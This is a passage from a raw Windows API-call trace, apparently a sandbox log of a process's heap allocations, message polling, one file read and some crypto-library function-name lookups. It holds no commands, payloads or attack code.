returned 0x2e54bc8 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5a020 [0234.472] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0234.472] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x2641, lpOverlapped=0x0) returned 1 [0234.474] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0234.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2641) returned 0x3bf0dd8 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0234.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0234.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2641) returned 0x3bf3428 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0234.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0234.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2641) returned 0x3bf0dd8 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0234.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0234.476] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0234.476] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0234.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0234.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2641) returned 0x3bf0dd8 [0234.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550b8 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ff8 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2641) returned 0x2f14818 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0234.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0234.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0234.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0234.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.481] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0234.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.481] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.482] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.482] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0234.544] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0234.545] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0234.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.545] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0234.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0234.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0234.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.545] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.546] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0234.546] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0234.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0234.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.546] HeapFree (in: hHeap=0x970000, 